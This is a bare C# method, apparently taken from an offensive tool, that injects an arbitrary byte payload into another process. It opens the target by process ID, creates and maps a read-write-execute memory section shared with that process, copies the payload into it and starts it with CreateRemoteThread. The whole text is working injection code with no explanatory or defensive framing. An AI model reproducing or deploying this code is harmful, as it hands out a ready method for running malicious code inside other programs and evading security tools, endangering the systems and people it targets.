public static bool OpenAndInject(int pid, byte[] payload)
{
IntPtr hproc = OpenProcess(pid);
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE);
if (section == IntPtr.Zero)
{
return(false);
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddr == IntPtr.Zero)
{
return(false);
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, hproc, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return(false);
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return(false);
}
Natives.CreateRemoteThread(hproc, IntPtr.Zero, 0, baseAddrEx, IntPtr.Zero, 0, IntPtr.Zero);
Natives.CloseHandle(section);
Natives.CloseHandle(hproc);
return(true);
}
